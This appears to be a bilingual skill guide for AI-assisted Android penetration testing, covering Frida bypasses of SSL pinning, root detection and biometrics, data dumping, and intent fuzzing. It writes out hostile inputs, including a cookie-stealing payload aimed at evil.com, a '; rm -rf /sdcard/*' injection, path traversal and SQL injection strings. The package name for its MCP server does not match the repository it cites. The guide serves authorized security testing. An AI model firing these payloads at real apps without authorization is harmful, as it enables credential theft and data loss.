android-pentest
Compare original and translation side by side
🇺🇸
Original
English🇨🇳
Translation
ChineseAndroid Mobile Application Penetration Testing
Android移动应用渗透测试
This skill enables comprehensive security testing of Android applications through ADB shell access to a rooted Android device and the Android Dynamic MCP server. It covers the full OWASP MASTG methodology from reconnaissance to exploitation and reporting.
本技能通过ADB Shell访问已Root的Android设备和Android Dynamic MCP服务器,实现对Android应用的全面安全测试。它涵盖了从侦察到利用再到报告的完整OWASP MASTG方法论。
When to Use This Skill
适用场景
This skill should be invoked when:
- Starting a new Android application security assessment
- Performing dynamic analysis on Android apps
- Bypassing security controls (SSL pinning, root detection, anti-tampering)
- Extracting and analyzing application data
- Testing authentication and authorization mechanisms
- Analyzing network communications
- Fuzzing application components (activities, services, content providers, broadcast receivers)
- Performing OWASP MASTG compliance testing
- Writing penetration test reports
在以下场景中应调用本技能:
- 启动新的Android应用安全评估
- 对Android应用进行动态分析
- 绕过安全控制(SSL固定、Root检测、防篡改)
- 提取并分析应用数据
- 测试认证与授权机制
- 分析网络通信
- 模糊测试应用组件(Activity、Service、Content Provider、Broadcast Receiver)
- 执行OWASP MASTG合规性测试
- 编写渗透测试报告
Trigger Phrases
触发短语
- "pentest this Android app"
- "security test the APK"
- "bypass SSL pinning on [app]"
- "extract data from [app]"
- "test Android authentication"
- "fuzz Android intents"
- "MASTG testing for [app]"
- "mobile app security assessment"
- "对这个Android应用进行渗透测试"
- "对APK进行安全测试"
- "绕过[应用]的SSL固定"
- "从[应用]中提取数据"
- "测试Android认证机制"
- "模糊测试Android Intent"
- "对[应用]进行MASTG测试"
- "移动应用安全评估"
Prerequisites
前置条件
Required Tools
必备工具
| Tool | Purpose | Installation |
|---|---|---|
| ADB | Device communication | |
| Frida | Dynamic instrumentation | |
| Objection | Mobile exploration | |
| apktool | APK decompilation | |
| jadx | Java decompilation | Download from GitHub |
| Burp Suite | Traffic interception | Download from PortSwigger |
| Android Studio | Emulator/tools | Download from Google |
| 工具 | 用途 | 安装方式 |
|---|---|---|
| ADB | 设备通信 | |
| Frida | 动态插桩 | |
| Objection | 移动应用探查 | |
| apktool | APK反编译 | |
| jadx | Java反编译 | 从GitHub下载 |
| Burp Suite | 流量拦截 | 从PortSwigger下载 |
| Android Studio | 模拟器/工具 | 从Google下载 |
MCP Server Setup
MCP服务器配置
The Android Dynamic MCP server provides comprehensive tooling. Ensure it's configured:
json
// ~/.claude/mcp.json
{
"mcpServers": {
"android-pentest": {
"command": "python",
"args": ["/path/to/android-dynamic/server.py"]
}
}
}Android Dynamic MCP服务器提供全面的工具支持,请确保已完成配置:
json
// ~/.claude/mcp.json
{
"mcpServers": {
"android-pentest": {
"command": "python",
"args": ["/path/to/android-dynamic/server.py"]
}
}
}Mobile MCP for Device Interaction
用于设备交互的Mobile MCP
For advanced device, emulator, and simulator interactions, use Mobile MCP:
- Repository: https://github.com/mobile-next/mobile-mcp
- Purpose: Provides MCP-based interaction with Android emulators and physical devices
- Features: Screen capture, touch automation, app lifecycle management, and UI inspection
json
// Add to ~/.claude/mcp.json
{
"mcpServers": {
"mobile-mcp": {
"command": "npx",
"args": ["-y", "@anthropic/mobile-mcp", "--android"]
}
}
}This complements Frida/Objection for scenarios requiring direct device UI interaction.
如需实现高级设备、模拟器和模拟器交互,请使用Mobile MCP:
- 仓库地址:https://github.com/mobile-next/mobile-mcp
- 用途:提供基于MCP的Android模拟器和物理设备交互能力
- 功能:屏幕捕获、触摸自动化、应用生命周期管理、UI检查
json
// 添加到 ~/.claude/mcp.json
{
"mcpServers": {
"mobile-mcp": {
"command": "npx",
"args": ["-y", "@anthropic/mobile-mcp", "--android"]
}
}
}这可以与Frida/Objection互补,满足需要直接设备UI交互的场景。
Device Setup
设备配置
Physical Device
物理设备
bash
undefinedbash
undefined1. Enable Developer Options (tap Build Number 7 times)
1. 启用开发者选项(连续点击版本号7次)
2. Enable USB Debugging
2. 启用USB调试
3. Root device (Magisk recommended)
3. 对设备进行Root(推荐使用Magisk)
Install Frida server
安装Frida服务器
adb push frida-server /data/local/tmp/
adb shell chmod 755 /data/local/tmp/frida-server
adb shell "su -c '/data/local/tmp/frida-server -D &'"
undefinedadb push frida-server /data/local/tmp/
adb shell chmod 755 /data/local/tmp/frida-server
adb shell "su -c '/data/local/tmp/frida-server -D &'"
undefinedEmulator
模拟器
bash
undefinedbash
undefinedUse Android Studio emulator with Google APIs (not Play Store)
使用带Google APIs的Android Studio模拟器(非Play Store版本)
Root with rootAVD or system image without Google Play
使用rootAVD或不含Google Play的系统镜像获取Root权限
Match Frida server architecture (x86_64 for most emulators)
匹配Frida服务器架构(大多数模拟器为x86_64)
undefinedundefinedVerification
验证
bash
undefinedbash
undefinedVerify ADB connection
验证ADB连接
adb devices
adb devices
Verify root access
验证Root权限
adb shell su -c "id"
adb shell su -c "id"
Verify Frida connection
验证Frida连接
frida-ps -U
frida-ps -U
Test MCP server
测试MCP服务器
In Claude Code: get_app_info("com.android.settings")
在Claude Code中执行: get_app_info("com.android.settings")
---
---Quick Start Guide
快速入门指南
1. Initial Setup (2 minutes)
1. 初始配置(2分钟)
User: I need to pentest the app com.example.targetapp
Claude: I'll set up the testing environment.
[MCP Tool Sequence]
1. get_app_info("com.example.targetapp")
→ Version, permissions, SDK levels, signatures
2. pull_apk("com.example.targetapp")
→ Extract APK for static analysis
3. list_exported_components("com.example.targetapp")
→ Map attack surface (activities, services, providers, receivers)用户:我需要对应用com.example.targetapp进行渗透测试
Claude:我将设置测试环境。
[MCP工具序列]
1. get_app_info("com.example.targetapp")
→ 获取版本、权限、SDK级别、签名信息
2. pull_apk("com.example.targetapp")
→ 提取APK用于静态分析
3. list_exported_components("com.example.targetapp")
→ 映射攻击面(Activity、Service、Content Provider、Broadcast Receiver)2. Bypass Security Controls (1 minute)
2. 绕过安全控制(1分钟)
[MCP Tool Sequence]
1. frida_spawn("com.example.targetapp")
→ PID: 12345
2. frida_bypass_ssl(12345)
→ SSL pinning disabled
3. frida_bypass_root(12345)
→ Root detection bypassed
4. setup_proxy("device-id", "192.168.1.100", 8080)
→ Traffic interception ready[MCP工具序列]
1. frida_spawn("com.example.targetapp")
→ PID: 12345
2. frida_bypass_ssl(12345)
→ SSL固定已禁用
3. frida_bypass_root(12345)
→ Root检测已绕过
4. setup_proxy("device-id", "192.168.1.100", 8080)
→ 流量拦截已准备就绪3. Dynamic Analysis
3. 动态分析
[MCP Tool Sequence]
1. frida_run_script(12345, "crypto_hooks.js")
2. frida_run_script(12345, "credential_hooks.js")
3. frida_run_script(12345, "intent_monitor.js")
4. get_logcat("com.example.targetapp")[MCP工具序列]
1. frida_run_script(12345, "crypto_hooks.js")
2. frida_run_script(12345, "credential_hooks.js")
3. frida_run_script(12345, "intent_monitor.js")
4. get_logcat("com.example.targetapp")4. Data Extraction
4. 数据提取
[MCP Tool Sequence]
1. dump_databases("com.example.targetapp")
2. dump_shared_prefs("com.example.targetapp")
3. dump_internal_storage("com.example.targetapp")
4. dump_external_storage("com.example.targetapp")[MCP工具序列]
1. dump_databases("com.example.targetapp")
2. dump_shared_prefs("com.example.targetapp")
3. dump_internal_storage("com.example.targetapp")
4. dump_external_storage("com.example.targetapp")Methodology Reference
方法论参考
| Document | Coverage |
|---|---|
| methodology/recon.md | Information gathering, attack surface mapping |
| methodology/static_analysis.md | APK analysis, code review, secrets detection |
| methodology/dynamic_analysis.md | Runtime testing, hooking, instrumentation |
| methodology/network_testing.md | Traffic analysis, API testing, TLS verification |
| methodology/data_storage.md | Local storage, databases, file permissions |
| methodology/crypto_testing.md | Encryption analysis, key management |
| methodology/auth_testing.md | Authentication, session management, biometrics |
| methodology/client_side_injection.md | WebViews, deep links, content providers |
| 文档 | 覆盖范围 |
|---|---|
| methodology/recon.md | 信息收集、攻击面映射 |
| methodology/static_analysis.md | APK分析、代码审查、敏感信息检测 |
| methodology/dynamic_analysis.md | 运行时测试、Hook、插桩 |
| methodology/network_testing.md | 流量分析、API测试、TLS验证 |
| methodology/data_storage.md | 本地存储、数据库、文件权限 |
| methodology/crypto_testing.md | 加密分析、密钥管理 |
| methodology/auth_testing.md | 认证、会话管理、生物识别 |
| methodology/client_side_injection.md | WebView、Deep Link、Content Provider |
Common Workflows with MCP Tool Sequences
常见工作流与MCP工具序列
Workflow 1: Complete Application Assessment
工作流1:完整应用评估
python
undefinedpython
undefinedPhase 1: Reconnaissance
阶段1:侦察
get_app_info("com.target.app")
pull_apk("com.target.app")
list_exported_components("com.target.app")
get_app_info("com.target.app")
pull_apk("com.target.app")
list_exported_components("com.target.app")
Phase 2: Bypass Protections
阶段2:绕过保护机制
pid = frida_spawn("com.target.app")
frida_bypass_ssl(pid)
frida_bypass_root(pid)
setup_proxy(device_id, "192.168.1.100", 8080)
pid = frida_spawn("com.target.app")
frida_bypass_ssl(pid)
frida_bypass_root(pid)
setup_proxy(device_id, "192.168.1.100", 8080)
Phase 3: Dynamic Analysis
阶段3:动态分析
frida_run_script(pid, "crypto_hooks.js")
frida_run_script(pid, "credential_hooks.js")
frida_run_script(pid, "intent_monitor.js")
frida_run_script(pid, "crypto_hooks.js")
frida_run_script(pid, "credential_hooks.js")
frida_run_script(pid, "intent_monitor.js")
Phase 4: Data Extraction
阶段4:数据提取
dump_databases("com.target.app")
dump_shared_prefs("com.target.app")
dump_internal_storage("com.target.app")
dump_databases("com.target.app")
dump_shared_prefs("com.target.app")
dump_internal_storage("com.target.app")
Phase 5: Component Testing
阶段5:组件测试
launch_activity("com.target.app", ".DeepLinkActivity",
extras={"url": "javascript:alert(1)"})
query_content_provider("content://com.target.app.provider/users")
fuzz_intent_extra("com.target.app", ".ProcessActivity",
"data", ["../../../etc/passwd", "' OR '1'='1"])
launch_activity("com.target.app", ".DeepLinkActivity",
extras={"url": "javascript:alert(1)"})
query_content_provider("content://com.target.app.provider/users")
fuzz_intent_extra("com.target.app", ".ProcessActivity",
"data", ["../../../etc/passwd", "' OR '1'='1"])
Phase 6: Network Testing
阶段6:网络测试
capture_traffic_start("com.target.app")
capture_traffic_start("com.target.app")
[interact with app]
[与应用交互]
capture_traffic_stop()
undefinedcapture_traffic_stop()
undefinedWorkflow 2: SSL Pinning Bypass
工作流2:SSL固定绕过
python
undefinedpython
undefinedMethod 1: Universal Frida bypass (most apps)
方法1:通用Frida绕过(适用于大多数应用)
pid = frida_spawn("com.target.app")
frida_bypass_ssl(pid)
pid = frida_spawn("com.target.app")
frida_bypass_ssl(pid)
Method 2: Custom script for specific library
方法2:针对特定库的自定义脚本
frida_run_script(pid, """
Java.perform(function() {
var CustomPinner = Java.use('com.target.app.security.Pinner');
CustomPinner.verify.implementation = function() {
console.log('[+] Bypassed custom pinner');
return true;
};
});
""")
frida_run_script(pid, """
Java.perform(function() {
var CustomPinner = Java.use('com.target.app.security.Pinner');
CustomPinner.verify.implementation = function() {
console.log('[+] Bypassed custom pinner');
return true;
};
});
""")
Method 3: If app uses flutter_ssl_pinning
方法3:如果应用使用flutter_ssl_pinning
frida_run_script(pid, """
var flutter = Process.findModuleByName("libflutter.so");
Interceptor.attach(Module.findExportByName("libssl.so", "SSL_CTX_set_custom_verify"), {
onEnter: function(args) {
args[2] = new NativeCallback(function() { return 0; }, 'int', ['pointer', 'pointer']);
}
});
""")
undefinedfrida_run_script(pid, """
var flutter = Process.findModuleByName("libflutter.so");
Interceptor.attach(Module.findExportByName("libssl.so", "SSL_CTX_set_custom_verify"), {
onEnter: function(args) {
args[2] = new NativeCallback(function() { return 0; }, 'int', ['pointer', 'pointer']);
}
});
""")
undefinedWorkflow 3: Authentication Testing
工作流3:认证测试
python
undefinedpython
undefinedHook authentication methods
Hook认证方法
frida_hook_method(pid, "com.target.app.auth.AuthService", "login")
frida_hook_method(pid, "com.target.app.auth.TokenValidator", "validateToken")
frida_hook_method(pid, "com.target.app.auth.AuthService", "login")
frida_hook_method(pid, "com.target.app.auth.TokenValidator", "validateToken")
Biometric bypass
生物识别绕过
frida_run_script(pid, "biometric_bypass.js")
frida_run_script(pid, "biometric_bypass.js")
Credential monitoring
凭证监控
frida_run_script(pid, "credential_hooks.js")
frida_run_script(pid, "credential_hooks.js")
Session manipulation
会话操控
frida_hook_method(pid, "com.target.app.session.SessionManager", "*")
undefinedfrida_hook_method(pid, "com.target.app.session.SessionManager", "*")
undefinedWorkflow 4: Deep Link / Intent Testing
工作流4:Deep Link / Intent测试
python
undefinedpython
undefinedMap attack surface
映射攻击面
components = list_exported_components("com.target.app")
components = list_exported_components("com.target.app")
Test deep links
测试Deep Link
launch_activity("com.target.app", ".DeepLinkActivity",
data_uri="targetapp://transfer?amount=1000&to=attacker")
launch_activity("com.target.app", ".DeepLinkActivity",
data_uri="targetapp://transfer?amount=1000&to=attacker")
XSS in WebView
WebView中的XSS测试
launch_activity("com.target.app", ".WebViewActivity",
extras={"url": "javascript:document.location='http://evil.com/?c='+document.cookie"})
launch_activity("com.target.app", ".WebViewActivity",
extras={"url": "javascript:document.location='http://evil.com/?c='+document.cookie"})
Path traversal in file handling
文件处理中的路径遍历测试
fuzz_intent_extra("com.target.app", ".FileActivity", "filepath", [
"../../../data/data/com.other.app/databases/secrets.db",
"file:///data/local/tmp/evil.html",
"content://com.target.app.provider/../../../etc/passwd"
])
fuzz_intent_extra("com.target.app", ".FileActivity", "filepath", [
"../../../data/data/com.other.app/databases/secrets.db",
"file:///data/local/tmp/evil.html",
"content://com.target.app.provider/../../../etc/passwd"
])
Content provider SQL injection
Content Provider SQL注入测试
query_content_provider("content://com.target.app.provider/users?id=1' OR '1'='1' --")
query_content_provider("content://com.target.app.provider/users?id=1' OR '1'='1' --")
Broadcast injection
广播注入测试
send_broadcast("com.target.app.CUSTOM_ACTION",
extras={"command": "; rm -rf /sdcard/*"})
undefinedsend_broadcast("com.target.app.CUSTOM_ACTION",
extras={"command": "; rm -rf /sdcard/*"})
undefinedWorkflow 5: Cryptography Analysis
工作流5:密码学分析
python
undefinedpython
undefinedHook all crypto operations
Hook所有加密操作
frida_run_script(pid, "crypto_hooks.js")
frida_run_script(pid, "crypto_hooks.js")
Detect weak algorithms
检测弱算法
frida_run_script(pid, """
Java.perform(function() {
var Cipher = Java.use('javax.crypto.Cipher');
Cipher.getInstance.overload('java.lang.String').implementation = function(algo) {
console.log('[CRYPTO] Algorithm: ' + algo);
if (algo.indexOf('ECB') !== -1) console.log('[!] WEAK: ECB mode');
if (algo.indexOf('DES') !== -1) console.log('[!] WEAK: DES');
if (algo.indexOf('RC4') !== -1) console.log('[!] WEAK: RC4');
return this.getInstance(algo);
};
});
""")
frida_run_script(pid, """
Java.perform(function() {
var Cipher = Java.use('javax.crypto.Cipher');
Cipher.getInstance.overload('java.lang.String').implementation = function(algo) {
console.log('[CRYPTO] Algorithm: ' + algo);
if (algo.indexOf('ECB') !== -1) console.log('[!] WEAK: ECB mode');
if (algo.indexOf('DES') !== -1) console.log('[!] WEAK: DES');
if (algo.indexOf('RC4') !== -1) console.log('[!] WEAK: RC4');
return this.getInstance(algo);
};
});
""")
Search for hardcoded keys
搜索硬编码密钥
frida_memory_search(pid, "-----BEGIN RSA PRIVATE KEY-----")
frida_memory_search(pid, "AES_SECRET_KEY")
frida_memory_search(pid, "-----BEGIN RSA PRIVATE KEY-----")
frida_memory_search(pid, "AES_SECRET_KEY")
Dump encryption keys at runtime
运行时导出加密密钥
frida_hook_method(pid, "javax.crypto.spec.SecretKeySpec", "$init")
undefinedfrida_hook_method(pid, "javax.crypto.spec.SecretKeySpec", "$init")
undefinedWorkflow 6: Data Exfiltration Analysis
工作流6:数据泄露分析
python
undefinedpython
undefinedFull data dump
完整数据导出
databases = dump_databases("com.target.app")
prefs = dump_shared_prefs("com.target.app")
internal = dump_internal_storage("com.target.app")
external = dump_external_storage("com.target.app")
logs = get_logcat("com.target.app")
databases = dump_databases("com.target.app")
prefs = dump_shared_prefs("com.target.app")
internal = dump_internal_storage("com.target.app")
external = dump_external_storage("com.target.app")
logs = get_logcat("com.target.app")
Analyze for sensitive data
分析敏感数据
Look for: tokens, passwords, PII, financial data, session IDs
查找:令牌、密码、个人身份信息(PII)、财务数据、会话ID
Monitor data writes in real-time
实时监控数据写入
frida_run_script(pid, """
Java.perform(function() {
var SharedPrefs = Java.use('android.app.SharedPreferencesImpl$EditorImpl');
SharedPrefs.putString.implementation = function(key, value) {
console.log('[PREFS] ' + key + ' = ' + value);
return this.putString(key, value);
};
});
""")
---frida_run_script(pid, """
Java.perform(function() {
var SharedPrefs = Java.use('android.app.SharedPreferencesImpl$EditorImpl');
SharedPrefs.putString.implementation = function(key, value) {
console.log('[PREFS] ' + key + ' = ' + value);
return this.putString(key, value);
};
});
""")
---MCP Tool Reference
MCP工具参考
Device Interaction
设备交互
| Tool | Description | Example |
|---|---|---|
| Current screen/UI elements | Finding clickable elements |
| Tap at coordinates | Automating login flow |
| Type into focused field | Entering credentials |
| Press key | BACK=4, HOME=3, ENTER=66 |
| Swipe gesture | Scrolling, pattern unlock |
| Long press | Context menus |
| 工具 | 描述 | 示例 |
|---|---|---|
| 获取当前屏幕/UI元素 | 查找可点击元素 |
| 点击指定坐标 | 自动化登录流程 |
| 向焦点输入框输入文本 | 输入凭证 |
| 按下指定按键 | BACK=4, HOME=3, ENTER=66 |
| 滑动手势 | 滚动、图案解锁 |
| 长按 | 上下文菜单 |
Frida Instrumentation
Frida插桩
| Tool | Description | Example |
|---|---|---|
| Start with Frida | Initial attachment |
| Attach to running | Already running app |
| Run Frida script | Custom hooks |
| Bypass SSL pinning | Enable interception |
| Bypass root detection | Evade security |
| Hook method | Trace calls |
| Trace crypto | Key extraction |
| Dump credentials | Credential theft |
| List classes | Class discovery |
| Search memory | Find secrets |
| 工具 | 描述 | 示例 |
|---|---|---|
| 使用Frida启动应用 | 初始附加 |
| 附加到运行中的应用 | 针对已启动的应用 |
| 运行Frida脚本 | 自定义Hook |
| 绕过SSL固定 | 启用流量拦截 |
| 绕过Root检测 | 规避安全机制 |
| Hook指定方法 | 跟踪调用 |
| 跟踪加密操作 | 密钥提取 |
| 导出凭证 | 凭证窃取测试 |
| 列举类 | 类发现 |
| 内存搜索 | 查找敏感信息 |
Network Tools
网络工具
| Tool | Description | Example |
|---|---|---|
| Configure proxy | Burp interception |
| Remove proxy | Cleanup |
| Install CA cert | Trust Burp CA |
| Start capture | Record traffic |
| Stop capture | Save PCAP |
| 工具 | 描述 | 示例 |
|---|---|---|
| 配置代理 | Burp流量拦截 |
| 移除代理 | 清理环境 |
| 安装CA证书 | 信任Burp CA证书 |
| 开始捕获流量 | 记录流量 |
| 停止捕获流量 | 保存PCAP文件 |
Data Extraction
数据提取
| Tool | Description | Example |
|---|---|---|
| Extract SQLite DBs | User data, creds |
| Get preferences | Tokens, settings |
| Internal files | Config, certs |
| SD card files | Exports, cache |
| Filtered logs | Debug info leak |
| 工具 | 描述 | 示例 |
|---|---|---|
| 导出SQLite数据库 | 用户数据、凭证 |
| 获取SharedPreferences | 令牌、设置 |
| 导出内部存储文件 | 配置、证书 |
| 导出SD卡文件 | 导出内容、缓存 |
| 获取过滤后的日志 | 调试信息泄露测试 |
Component Testing
组件测试
| Tool | Description | Example |
|---|---|---|
| Map attack surface | Find entry points |
| Start activity | Deep link test |
| Send broadcast | Broadcast injection |
| Start service | Service abuse |
| Query provider | Data leakage |
| Fuzz intents | Find vulns |
| 工具 | 描述 | 示例 |
|---|---|---|
| 映射攻击面 | 查找入口点 |
| 启动Activity | Deep Link测试 |
| 发送广播 | 广播注入测试 |
| 启动Service | Service滥用测试 |
| 查询Content Provider | 数据泄露测试 |
| 模糊测试Intent参数 | 查找漏洞 |
App Management
应用管理
| Tool | Description | Example |
|---|---|---|
| Install APK | Deploy test build |
| Remove app | Cleanup |
| Clear data | Fresh state |
| App metadata | Permissions, SDK |
| All packages | Discovery |
| Extract APK | Static analysis |
| 工具 | 描述 | 示例 |
|---|---|---|
| 安装APK | 部署测试版本 |
| 卸载应用 | 清理环境 |
| 清除应用数据 | 恢复初始状态 |
| 获取应用元数据 | 权限、SDK信息 |
| 列举所有已安装应用 | 应用发现 |
| 提取APK | 静态分析 |
Frida Script Library
Frida脚本库
Pre-built scripts in directory:
/scripts/| Script | Purpose |
|---|---|
| Universal SSL/TLS pinning bypass |
| Root detection bypass |
| Cryptographic operation monitoring |
| Credential capture |
| Network traffic monitoring |
| Biometric authentication bypass |
| Anti-tampering/debugger bypass |
| Intent/IPC monitoring |
| WebView security monitoring |
| Dynamic code loading detection |
| Android Keystore monitoring |
| Generic method tracing |
预构建脚本位于目录:
/scripts/| 脚本 | 用途 |
|---|---|
| 通用SSL/TLS固定绕过 |
| Root检测绕过 |
| 加密操作监控 |
| 凭证捕获 |
| 网络流量监控 |
| 生物识别认证绕过 |
| 防篡改/调试器绕过 |
| Intent/IPC监控 |
| WebView安全监控 |
| 动态代码加载检测 |
| Android Keystore监控 |
| 通用方法跟踪 |
Troubleshooting Guide
故障排除指南
Frida Issues
Frida问题
"Failed to spawn: unable to find application"
bash
undefined"Failed to spawn: unable to find application"
bash
undefinedSolution: Verify package name
解决方案:验证包名
list_installed_apps() | grep <partial_name>
adb shell pm list packages | grep <partial_name>
**"Failed to attach: process not found"**
```bashlist_installed_apps() | grep <partial_name>
adb shell pm list packages | grep <partial_name>
**"Failed to attach: process not found"**
```bashSolution: App not running, use spawn instead
解决方案:应用未运行,使用spawn替代
pid = frida_spawn("com.target.app") # Instead of frida_attach
**"Script terminated with error"**
```bashpid = frida_spawn("com.target.app") # 替代frida_attach
**"Script terminated with error"**
```bashSolution: Class/method not found
解决方案:类/方法未找到
frida_enumerate_classes(pid, "TargetClass") # Find exact class
frida_enumerate_classes(pid, "TargetClass") # 查找精确类名
Check for obfuscation - class names may be: a, b, c, etc.
检查是否存在混淆 - 类名可能为:a、b、c等
**Frida server crashes**
```bash
**Frida服务器崩溃**
```bashSolution: Version mismatch
解决方案:版本不匹配
frida --version # Check client version
frida --version # 检查客户端版本
Download matching server from https://github.com/frida/frida/releases
undefinedundefinedSSL Pinning Issues
SSL固定问题
Universal bypass doesn't work
bash
undefined通用绕过脚本无效
bash
undefinedSolution: Custom pinning implementation
解决方案:自定义固定实现
- Decompile APK with jadx
- Search: "certificate", "pin", "ssl", "trust"
- Identify custom class and method
- Write targeted Frida hook
- 使用jadx反编译APK
- 搜索关键词:"certificate"、"pin"、"ssl"、"trust"
- 识别自定义类和方法
- 编写针对性的Frida Hook
Check for: OkHttp CertificatePinner, custom TrustManager,
检查以下情况:OkHttp CertificatePinner、自定义TrustManager、
native SSL verification, Network Security Config
原生SSL验证、Network Security Config
**App still fails after bypass**
```bash
**绕过后应用仍无法正常工作**
```bashSolution: Multiple pinning layers
解决方案:多层固定机制
- Check for native SSL verification (libssl.so)
- Use anti_tampering_bypass.js for Frida detection bypass
- Try objection: android sslpinning disable
- Consider frida-gadget for persistent injection
undefined- 检查是否存在原生SSL验证(libssl.so)
- 使用anti_tampering_bypass.js绕过Frida检测
- 尝试使用Objection:android sslpinning disable
- 考虑使用frida-gadget进行持久化注入
undefinedRoot Detection Issues
Root检测问题
App detects root and exits
bash
undefined应用检测到Root并退出
bash
undefinedSolution: Multiple detection vectors
解决方案:多检测向量
- Use comprehensive root_bypass.js
- Enable Magisk Hide / Zygisk DenyList
- Check for native root checks (hook fopen, access)
- Consider frida-gadget embedded in APK
**App detects Frida**
```bash- 使用全面的root_bypass.js
- 启用Magisk Hide / Zygisk DenyList
- 检查是否存在原生Root检测(Hook fopen、access)
- 考虑将frida-gadget嵌入APK
**应用检测到Frida**
```bashSolution: Frida detection in place
解决方案:Frida检测机制
- Use anti_tampering_bypass.js first
- Rename frida-server binary
- Use frida-gadget instead
- Hook pthread_create to hide Frida threads
undefined- 先使用anti_tampering_bypass.js
- 重命名frida-server二进制文件
- 改用frida-gadget
- Hook pthread_create以隐藏Frida线程
undefinedADB Issues
ADB问题
"device unauthorized"
bash
adb kill-server
adb start-server"device unauthorized"
bash
adb kill-server
adb start-serverAccept prompt on device
在设备上接受授权提示
**"Permission denied" for data**
```bash
adb root # If using userdebug build
adb shell su -c "cat /data/data/<pkg>/..." # With root
**数据访问"Permission denied"**
```bash
adb root # 如果使用userdebug版本
adb shell su -c "cat /data/data/<pkg>/..." # 使用Root权限Data Extraction Issues
数据提取问题
Database is encrypted (SQLCipher)
bash
undefined数据库已加密(SQLCipher)
bash
undefinedHook to capture password
Hook以捕获密码
frida_hook_method(pid, "net.sqlcipher.database.SQLiteDatabase", "openOrCreateDatabase")
frida_hook_method(pid, "net.sqlcipher.database.SQLiteDatabase", "openOrCreateDatabase")
Or search memory for key
或在内存中搜索密钥
frida_memory_search(pid, "x]@1#%hJ") # Common patterns
---frida_memory_search(pid, "x]@1#%hJ") # 常见模式
---Checklists Reference
清单参考
| Checklist | Purpose |
|---|---|
| checklists/owasp_mastg_full.md | Complete MASTG compliance |
| checklists/quick_wins.md | Fast vulnerability finding |
| checklists/pre_engagement.md | Setup verification |
| checklists/report_items.md | Report completeness |
| 清单 | 用途 |
|---|---|
| checklists/owasp_mastg_full.md | 完整MASTG合规性检查 |
| checklists/quick_wins.md | 快速查找漏洞 |
| checklists/pre_engagement.md | 前置条件验证 |
| checklists/report_items.md | 报告完整性检查 |
Templates Reference
模板参考
| Template | Purpose |
|---|---|
| templates/finding_template.md | Individual finding docs |
| templates/executive_summary.md | Management summary |
| templates/technical_report.md | Full technical report |
| templates/remediation_guide.md | Developer fixes |
| 模板 | 用途 |
|---|---|
| templates/finding_template.md | 单个漏洞文档 |
| templates/executive_summary.md | 管理层摘要 |
| templates/technical_report.md | 完整技术报告 |
| templates/remediation_guide.md | 开发者修复指南 |
Example Claude Code Interactions
Claude Code交互示例
Example 1: Starting New Assessment
示例1:启动新评估
User: I need to pentest com.megabank.mobile. It has SSL pinning and root
detection.
Claude: I'll set up the testing environment for com.megabank.mobile.
[Executes MCP tools]
1. Getting app information:
> get_app_info("com.megabank.mobile")
Version: 3.2.1, Target SDK: 33, Min SDK: 26
Permissions: INTERNET, CAMERA, BIOMETRIC, READ_CONTACTS...
2. Extracting APK:
> pull_apk("com.megabank.mobile")
Saved to: /tmp/com.megabank.mobile.apk
3. Mapping attack surface:
> list_exported_components("com.megabank.mobile")
Exported Activities:
- com.megabank.mobile.DeepLinkActivity (intent-filter: megabank://)
- com.megabank.mobile.ShareReceiveActivity
Content Providers:
- com.megabank.mobile.provider.DocumentProvider (exported)
Broadcast Receivers:
- com.megabank.mobile.PushReceiver
4. Starting with Frida and bypassing protections:
> frida_spawn("com.megabank.mobile")
PID: 12345
> frida_bypass_ssl(12345)
[+] SSL pinning bypass active - hooked 8 methods
> frida_bypass_root(12345)
[+] Root detection bypass active
5. Configuring traffic interception:
> setup_proxy("emulator-5554", "192.168.1.100", 8080)
[+] Proxy configured
Environment ready. I've identified 3 potential entry points for testing:
1. Deep link handler (megabank://) - test for URL scheme hijacking
2. DocumentProvider - test for path traversal
3. PushReceiver - test for broadcast injection
Would you like me to proceed with dynamic analysis or test specific components?用户:我需要对com.megabank.mobile进行渗透测试,它有SSL固定和Root检测。
Claude:我将为com.megabank.mobile设置测试环境。
[执行MCP工具]
1. 获取应用信息:
> get_app_info("com.megabank.mobile")
版本: 3.2.1, 目标SDK: 33, 最小SDK: 26
权限: INTERNET, CAMERA, BIOMETRIC, READ_CONTACTS...
2. 提取APK:
> pull_apk("com.megabank.mobile")
保存至: /tmp/com.megabank.mobile.apk
3. 映射攻击面:
> list_exported_components("com.megabank.mobile")
已导出Activity:
- com.megabank.mobile.DeepLinkActivity (intent-filter: megabank://)
- com.megabank.mobile.ShareReceiveActivity
Content Provider:
- com.megabank.mobile.provider.DocumentProvider (已导出)
Broadcast Receiver:
- com.megabank.mobile.PushReceiver
4. 启动Frida并绕过保护:
> frida_spawn("com.megabank.mobile")
PID: 12345
> frida_bypass_ssl(12345)
[+] SSL固定绕过已激活 - Hook了8个方法
> frida_bypass_root(12345)
[+] Root检测绕过已激活
5. 配置流量拦截:
> setup_proxy("emulator-5554", "192.168.1.100", 8080)
[+] 代理已配置
环境已准备就绪。我已识别出3个潜在测试入口点:
1. Deep Link处理器(megabank://) - 测试URL scheme劫持
2. DocumentProvider - 测试路径遍历
3. PushReceiver - 测试广播注入
您希望我继续进行动态分析还是测试特定组件?Example 2: Data Storage Investigation
示例2:数据存储调查
User: Check what sensitive data this app stores locally
Claude: I'll perform comprehensive data storage analysis.
[Executes MCP tools]
1. SharedPreferences analysis:
> dump_shared_prefs("com.megabank.mobile")
[!] FINDING in auth_prefs.xml:
- auth_token: "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."
- refresh_token: "dGhpcyBpcyBhIHJlZnJlc2ggdG9rZW4..."
- pin_hash: "5e884898da28047d9166..."
Severity: HIGH - Authentication tokens stored in plaintext
MASTG: MASTG-TEST-0001 (Insecure Data Storage)
2. Database analysis:
> dump_databases("com.megabank.mobile")
Found: app_data.db (356 KB)
[!] FINDING:
- Table 'accounts': account_number, balance, last_transaction
- Table 'transactions': 847 records with transaction history
- Table 'cached_credentials': username, password_hash
Severity: HIGH - Financial data in unencrypted database
MASTG: MASTG-TEST-0001
3. Internal storage:
> dump_internal_storage("com.megabank.mobile")
[!] FINDING: /files/user_profile.json
Contains: full_name, email, phone, ssn_last_4
Severity: MEDIUM - PII in plaintext file
4. External storage:
> dump_external_storage("com.megabank.mobile")
[!] FINDING: /Android/data/com.megabank.mobile/files/exports/
- statements_2024.pdf (world-readable)
Severity: MEDIUM - Sensitive docs on external storage
MASTG: MASTG-TEST-0003
Summary:
| Finding | Severity | MASTG ID |
|---------|----------|----------|
| Auth tokens in SharedPreferences | High | MASTG-TEST-0001 |
